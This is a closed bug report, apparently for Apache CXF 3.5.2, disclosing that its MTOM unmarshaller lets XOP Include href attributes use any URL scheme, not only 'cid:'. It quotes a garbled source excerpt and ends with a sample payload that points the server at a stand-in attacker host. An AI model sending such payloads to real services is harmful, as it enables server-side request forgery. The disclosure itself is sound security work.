Details
-
Bug
-
Status: Closed
-
Major
-
Resolution: Fixed
-
3.5.2
-
None
-
Unknown
Description
When used with SOAP web service or JAXRS web service with MTOM enabled, Unmarshaller allows XOP Include tag to have href attributes that allow any protocols. According to the W3C MTOM spec, only "cid:" should be allowed for href scheme.
The affected call stack is:
AttachmentUtil.getAttachmentDataSource(String, Collection<Attachment>) line: 554
JAXBAttachmentUnmarshaller.getAttachmentAsDataHandler(String) line: 49
MTOMDecorator.startElement(TagName) line: 70
The source code is:
public static DataSource getAttachmentDataSource(String contentId, Collection<Attachment> atts) {
// Is this right? - DD
if (contentId.startsWith("cid:")) {
try
catch (UnsupportedEncodingException ue)
{ contentId = contentId.substring(4); } return loadDataSource(contentId, atts);
} else if (contentId.indexOf("://") == -1)
else {// should only take cid for XOP
try
catch (MalformedURLException e)
{ throw new Fault(e); }}
}
The exploit can send payload containing:
<stringvalue><inc:Include href="http://attackers.site/exploit/payload" xmlns:inc="http://www.w3.org/2004/08/xop/include"/><stringvalue>
Attachments
Issue Links
- links to